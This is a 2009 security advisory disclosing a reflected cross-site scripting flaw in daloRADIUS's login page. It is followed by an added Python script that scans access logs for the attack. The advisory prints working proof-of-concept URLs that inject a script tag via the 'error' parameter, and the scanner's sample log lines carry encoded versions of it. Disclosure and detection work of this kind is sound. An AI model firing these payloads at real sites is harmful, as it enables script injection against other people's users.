Computer Security
[EN] securityvulns.ru

From:hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date:15.12.2009
Subject:Daloradius XSS Vulnerability

###########################################
#
# Script Name : daloradius ( All Versions )
#  
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://sourceforge.net/projects/daloradius/
#

###########################################

PoC :

http://[target]/[path]/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/root/daloradius-users/login.php?error=>"><script>alert('Hadi Kiamarsi')</script>
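
A log check for requests matching the pattern reported above: it flags access-log entries for daloradius-users/login.php whose `error` parameter decodes to markup characters. This is an added example, not part of the original advisory or of the daloRADIUS project; it assumes combined-format access logs, and the function names and sample entries are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Request field of a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Characters that let a reflected value break out of an attribute or tag.
MARKUP_RE = re.compile(r'[<>"\']')

def decode_fully(value, max_rounds=3):
    """Undo layered percent-encoding (%253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_error_param(log_line):
    """Return the decoded `error` value when a request to
    daloradius-users/login.php carries markup in it, else None."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/daloradius-users/login.php"):
        return None
    for name, value in parse_qsl(url.query, keep_blank_values=True):
        decoded = decode_fully(value)
        if name.lower() == "error" and MARKUP_RE.search(decoded):
            return decoded
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every suspicious entry."""
    found = ((n, suspicious_error_param(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in found if v is not None]

# Constructed sample entries (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [15/Dec/2009:10:00:00 +0000] "GET /daloradius-users/login.php HTTP/1.1" 200 2310',
    '192.0.2.11 - - [15/Dec/2009:10:00:05 +0000] "GET /daloradius-users/login.php?error=%3E%22%3E%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 2388',
    '192.0.2.12 - - [15/Dec/2009:10:00:09 +0000] "GET /daloradius-users/login.php?error=%253Cb%253E HTTP/1.1" 200 2330',
    '192.0.2.13 - - [15/Dec/2009:10:00:12 +0000] "GET /daloradius-users/login.php?error=Login+failed HTTP/1.1" 200 2325',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: error={value!r}")
```

The third sample entry is double-encoded, which is why the value is decoded repeatedly before the character check.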
